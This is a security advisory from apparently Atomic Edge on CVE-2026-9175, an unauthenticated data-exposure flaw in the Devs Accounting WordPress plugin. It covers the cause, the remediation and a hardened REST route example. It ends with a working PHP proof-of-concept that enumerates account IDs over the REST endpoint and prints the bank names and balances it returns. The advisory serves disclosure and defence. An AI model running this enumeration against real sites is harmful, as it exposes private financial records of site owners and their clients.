Atomic Edge analysis of CVE-2026-9175 (metadata-based): This vulnerability affects the Devs Accounting plugin for WordPress, versions 1.2.0 and earlier. It exposes sensitive financial account data (account name, bank name, opening balance) to unauthenticated attackers via a REST API endpoint. The CVSS score is 5.3 (medium), but the practical impact is higher than that figure suggests because the disclosed data consists of private accounting records.
Root Cause: The assigned weakness, CWE-862 (Missing Authorization), together with the vulnerability description, indicates that the REST API callback `get_single_account()` is registered with a `permission_callback` that unconditionally returns `true`. The underlying mechanism is well established: `register_rest_route()` requires a `permission_callback`, and when that callback is `__return_true` (or any callable that always returns true) the endpoint is reachable by any unauthenticated visitor. The endpoint path is `/devs-accounting/v1/get-account/` followed by a numeric account ID; the ID appears directly in the URL and is trivially enumerable. The specific cause is inferred from the official CVE description; no source code was available to confirm it.
Exploitation: An attacker sends an unauthenticated GET request to the WordPress REST API at `/wp-json/devs-accounting/v1/get-account/1`, replacing the trailing digit with any numeric ID (on sites without pretty permalinks the same route is reachable as `/?rest_route=/devs-accounting/v1/get-account/1`). The endpoint returns JSON containing the account name, bank name, and opening balance for that account. Because there is no authentication or authorization check, the attacker can iterate through account IDs (1, 2, 3, ...) to extract all stored financial records. The attack requires no privileges, user interaction, or special payloads; a plain HTTP client or browser is sufficient.
Remediation: The plugin developer must change the `register_rest_route()` call so that its `permission_callback` verifies, via `current_user_can()`, that the current user holds an appropriate capability (e.g., `manage_options` or a custom capability). The authorization check belongs in the permission callback, which WordPress evaluates before the data callback runs, rather than being left to the callback that returns account data. Since no patched version exists (per the CVE metadata), administrators should disable or remove the plugin until an update becomes available.
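The registration pattern described above, as an added illustration: the open `permission_callback` the CVE description implies, beside a hardened registration. This is example code written for this analysis, not the Devs Accounting plugin's own source (which was not available). The route regex `(?P<id>\d+)`, the capability name `manage_accounting`, the function names and the `devs_acct_load_account()` data-access helper are assumptions; only the namespace `devs-accounting/v1`, the `get-account` route and the callback name `get_single_account` come from the advisory text.

```php
<?php
// Added illustration for this analysis; NOT the Devs Accounting plugin's code.
// Route regex, capability name and helper functions are assumptions.

// VULNERABLE PATTERN (shown for contrast, deliberately not hooked):
// '__return_true' as permission_callback lets any unauthenticated visitor read
// /wp-json/devs-accounting/v1/get-account/<id>.
function devs_acct_register_routes_vulnerable() {
    register_rest_route( 'devs-accounting/v1', '/get-account/(?P<id>\d+)', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'get_single_account',
        'permission_callback' => '__return_true',
    ) );
}

// HARDENED PATTERN: authorization is enforced in permission_callback, the id
// argument is validated and sanitized, and failures get a proper 401/403.
function devs_acct_register_routes_fixed() {
    register_rest_route( 'devs-accounting/v1', '/get-account/(?P<id>\d+)', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'get_single_account',
        'permission_callback' => function ( WP_REST_Request $request ) {
            // 'manage_accounting' is an assumed custom capability; a core
            // capability such as 'manage_options' would work the same way.
            if ( current_user_can( 'manage_accounting' ) ) {
                return true;
            }
            // rest_authorization_required_code() yields 401 for anonymous
            // callers and 403 for logged-in users lacking the capability.
            return new WP_Error(
                'rest_forbidden',
                __( 'You are not allowed to view account records.', 'devs-accounting' ),
                array( 'status' => rest_authorization_required_code() )
            );
        },
        'args' => array(
            'id' => array(
                'required'          => true,
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && (int) $value > 0;
                },
                'sanitize_callback' => 'absint',
            ),
        ),
    ) );
}
add_action( 'rest_api_init', 'devs_acct_register_routes_fixed' );

// Assumed shape of the data callback; devs_acct_load_account() stands in for
// the plugin's real data-access layer and is not defined here.
function get_single_account( WP_REST_Request $request ) {
    $id      = (int) $request->get_param( 'id' );
    $account = devs_acct_load_account( $id );
    if ( ! $account ) {
        return new WP_Error(
            'devs_acct_not_found',
            __( 'Account not found.', 'devs-accounting' ),
            array( 'status' => 404 )
        );
    }
    return rest_ensure_response( $account );
}
```

Two practical notes for whoever applies such a fix: browser-side callers that previously hit the open endpoint anonymously will now need to be logged in and send an `X-WP-Nonce` header, so the plugin's own front-end code may need updating alongside the route; and until a patched release exists, a site owner who cannot remove the plugin can short-circuit requests to the `devs-accounting/v1` namespace from a small must-use plugin using the `rest_pre_dispatch` filter, which is a coarser but immediate mitigation.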
Impact: Exploitation leads to the disclosure of private financial account records, including account names, associated bank names, and opening balances. This information can be used for competitive intelligence, social engineering, or fraud. The attacker can enumerate all accounts in the system. The confidentiality of sensitive financial data is compromised, potentially violating data protection regulations and damaging the trust of the site owner and their clients.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9175 - Devs Accounting <= 1.2.0 - Missing Authorization to Unauthenticated Sensitive Information Exposure via 'id' Parameter
//
// Sends unauthenticated GET requests to /wp-json/devs-accounting/v1/get-account/<id>
// for a range of numeric IDs and prints any JSON the endpoint returns. No cookies,
// nonce or credentials are supplied at any point.

// Configuration: change this to the target WordPress site URL
$target_url = 'http://example.com';

// REST API endpoint pattern (the numeric account ID is appended below)
$endpoint = '/wp-json/devs-accounting/v1/get-account/';

// Iterate over likely account IDs (starting from 1)
for ($id = 1; $id <= 10; $id++) {
    $request_url = rtrim($target_url, '/') . $endpoint . $id;
    echo "[+] Fetching account ID: $id\n";
    echo "    URL: $request_url\n";

    // Initialize cURL session
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $request_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Allow self-signed certificates in lab environments only
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: AtomicEdge-PoC/1.0',
        'Accept: application/json',
    ));
    $response  = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $curl_err  = curl_error($ch);
    curl_close($ch);

    if ($response === false) {
        echo "    [-] cURL error: $curl_err\n\n";
        break;
    }

    // Decode once; $data is null for non-JSON bodies
    $data = json_decode($response, true);

    if ($http_code === 200 && !empty($data)) {
        echo "    [+] Data retrieved successfully:\n";
        echo '    ' . json_encode($data, JSON_PRETTY_PRINT) . "\n\n";
    } elseif ($http_code === 200) {
        echo "    [-] Empty or invalid JSON response\n\n";
    } elseif ($http_code === 404) {
        // WordPress core answers 404 with code "rest_no_route" when no such route is
        // registered (plugin absent or REST API disabled); a 404 for a missing account
        // would come from the plugin's own callback and carry a different code, if any.
        if (is_array($data) && isset($data['code']) && $data['code'] === 'rest_no_route') {
            echo "    [-] rest_no_route: endpoint not registered on this site\n\n";
        } else {
            echo "    [-] Account not found (404)\n\n";
        }
        break; // Stop: either the route does not exist or the account IDs are exhausted
    } elseif ($http_code === 401 || $http_code === 403) {
        echo "    [-] HTTP $http_code - endpoint requires authorization (not vulnerable or already patched)\n\n";
        break;
    } else {
        echo "    [-] HTTP $http_code - Endpoint may not exist or is blocked\n\n";
        break;
    }
}
echo "[+] PoC complete.\n";